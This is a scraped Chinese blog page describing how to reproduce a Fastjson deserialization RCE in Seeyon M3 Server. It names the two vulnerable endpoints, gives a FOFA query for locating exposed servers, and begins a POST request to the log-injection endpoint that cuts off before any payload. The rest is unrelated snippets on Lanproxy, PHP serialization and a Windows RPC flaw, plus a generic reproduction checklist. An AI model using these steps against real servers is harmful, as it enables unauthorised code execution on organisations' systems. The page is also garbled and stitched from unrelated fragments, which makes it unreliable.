相关文章推荐
玩篮球的手套  ·  ASP.NET 网页模板-基础·  3 小时前    · 
玩篮球的手套  ·  致远M3 ...·  2 周前    · 
玩篮球的手套  ·  BurpSuite Pro 2023.6 ...·  9 月前    · 
玩篮球的手套  ·  matplotlib中plt.legend等 ...·  10 月前    · 
玩篮球的手套  ·  html计时器源代码·  10 月前    · 
玩篮球的手套  ·  Windows console with ...·  11 月前    · 
伤情的莴苣  ·  IDEA ...·  28 分钟前    · 
狂野的泡面  ·  IntelliJ IDEA 的 Code ...·  29 分钟前    · 
高大的冰棍  ·  3个可以写进简历的京东AI ...·  55 分钟前    · 
帅气的消防车  ·  Spring Boot - ...·  1小时前    · 
完美的红金鱼  ·  Tableau Mobile ...·  1小时前    · 
没人理的蚂蚁  ·  Android ...·  1小时前    · 

0x01 产品简介

M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。

0x02 漏洞概述

致远M3 server中 mobile_portal 接口处 发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。

0x03 复现环境

FOFA:title="M3-Server"

0x04 漏洞复现

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,
致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
漏洞 简介 Lanproxy 是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持 tcp 流量转发,可支持任何 tcp 上层协议(访问内网网站、本地支付接口调试、ssh 访问、 远程 桌面…)。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud 等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据 安全 也是一大隐患。 通过说明我们知道 server 的配置文件放置在 conf 目录中,配置 confi
1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和 反序列化 一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; $s=new S(); //创建一个对象 serialize($s 漏洞 等级:高危 漏洞 影响:服务器服务中的 漏洞 可能允许 远程 执行 代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞 原理:攻击者通过特制的RPC请求发给存在 漏洞 的主机,将可导...
致远 m3 -server存在 反序列化 RCE 漏洞 ,攻击者可以利用此 漏洞 远程 服务器上 执行 恶意代码。为了 复现 这个 漏洞 ,我们可以按照以下步骤进行: 1. 确认 漏洞 版本:首先需要确定目标服务器上的 致远 m3 -server版本是否存在 漏洞 。可以通过查看官方公告或 漏洞 报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该 漏洞 的利用工具,例如ysoserial等,用于构造恶意的 反序列化 payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发 漏洞 执行 恶意代码。 5. 验证 漏洞 利用:在攻击成功后,可以通过查看服务器日志或 执行 一些系统 命令 来验证是否成功 执行 了恶意代码。 6. 报告 漏洞 :一旦成功 复现 漏洞 ,需要及时向 致远 m3 -server的官方或相关 安全 机构报告 漏洞 细节,以便及时修复和防范。 总的来说, 复现 致远 m3 -server 反序列化 RCE 漏洞 需要仔细分析 漏洞 利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。
 
推荐文章